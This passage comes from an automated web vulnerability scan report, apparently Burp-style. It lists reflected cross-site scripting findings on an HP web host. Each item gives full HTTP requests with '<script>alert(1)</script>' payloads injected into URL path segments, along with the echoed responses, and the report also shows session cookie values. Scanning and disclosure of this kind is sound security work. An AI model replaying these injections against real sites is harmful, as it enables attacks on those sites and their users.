User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:57 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30835


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources6d07e"><script>alert(1)</script>8207582cd96/scripts/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.82. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3359"><script>alert(1)</script>57b0543e217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsf3359"><script>alert(1)</script>57b0543e217/swfobject.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30496


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf3359"><script>alert(1)</script>57b0543e217/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.83. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2495"><script>alert(1)</script>35a8d132f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/swfobject.jsa2495"><script>alert(1)</script>35a8d132f3c?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30707


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/swfobject.jsa2495"><script>alert(1)</script>35a8d132f3c?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.84. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf1a"><script>alert(1)</script>3392b3ceb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources4cf1a"><script>alert(1)</script>3392b3ceb5/scripts/widget/loader.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources4cf1a"><script>alert(1)</script>3392b3ceb5/scripts/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.85. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8e0"><script>alert(1)</script>3f3ede39727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsfe8e0"><script>alert(1)</script>3f3ede39727/widget/loader.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfe8e0"><script>alert(1)</script>3f3ede39727/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.86. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e19f"><script>alert(1)</script>526b6f59145 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widget9e19f"><script>alert(1)</script>526b6f59145/loader.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30665


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget9e19f"><script>alert(1)</script>526b6f59145/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.87. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7e7"><script>alert(1)</script>29741d37646 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widget/loader.js1b7e7"><script>alert(1)</script>29741d37646?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/loader.js1b7e7"><script>alert(1)</script>29741d37646?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.88. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b659"><script>alert(1)</script>a61331b47f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources8b659"><script>alert(1)</script>a61331b47f9/scripts/widget/util.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:10 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30805


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources8b659"><script>alert(1)</script>a61331b47f9/scripts/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.89. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05c4"><script>alert(1)</script>cb74612d597 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsf05c4"><script>alert(1)</script>cb74612d597/widget/util.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:12 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf05c4"><script>alert(1)</script>cb74612d597/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.90. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf2f"><script>alert(1)</script>11b0cdd28a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widgetbbf2f"><script>alert(1)</script>11b0cdd28a4/util.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:13 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30907


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widgetbbf2f"><script>alert(1)</script>11b0cdd28a4/util.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.91. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a40"><script>alert(1)</script>35a035cec2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widget/util.jsb6a40"><script>alert(1)</script>35a035cec2e?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:13 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30770


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/util.jsb6a40"><script>alert(1)</script>35a035cec2e?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.92. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/stylesheets/site.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a135e"><script>alert(1)</script>2f39e748c96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesa135e"><script>alert(1)</script>2f39e748c96/stylesheets/site.jsp?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Sat, 23-Sep-2079 01:58:06 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesa135e"><script>alert(1)</script>2f39e748c96/stylesheets/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.93. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/stylesheets/site.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc38"><script>alert(1)</script>22bac2c020c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/stylesheetsdbc38"><script>alert(1)</script>22bac2c020c/site.jsp?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheetsdbc38"><script>alert(1)</script>22bac2c020c/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.94. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/stylesheets/site.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5152e"><script>alert(1)</script>7a5ede59c82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/stylesheets/site.jsp5152e"><script>alert(1)</script>7a5ede59c82?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
